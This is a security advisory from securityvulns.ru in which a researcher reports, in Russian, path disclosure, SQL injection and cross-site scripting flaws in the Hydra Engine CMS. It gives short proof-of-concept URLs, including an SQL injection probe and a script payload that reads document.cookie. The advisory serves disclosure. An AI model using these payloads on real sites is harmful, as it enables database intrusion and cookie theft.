Computer Security

Security Advisory: Vulnerabilities in Hydra Engine
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA-1990-1] New trac-git packages fix code execution

  [SECURITY] [DSA-1990-2] New trac-git package fixes regression

  OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

  PR09-19: Cross-Site Scripting (XSS) on CommonSpot server

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:04.02.2010
Subject:Vulnerabilities in Hydra Engine

Здравствуйте 3APA3A!

Сообщаю вам о Full path disclosure, SQL Injection и Cross-Site Scripting уязвимостях в системе Hydra Engine. Это украинская CMS.

Full path disclosure:

http://site/search/’/

SQL Injection:

http://site/search/'%20and%20version()%3E5--%20/

XSS:

http://site/search/'1%3Cbody%20onload=alert(document.
cookie)%3E/

О данных уязвимостях я упомянул у себя на сайте (http://websecurity.com.ua/3453/).

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru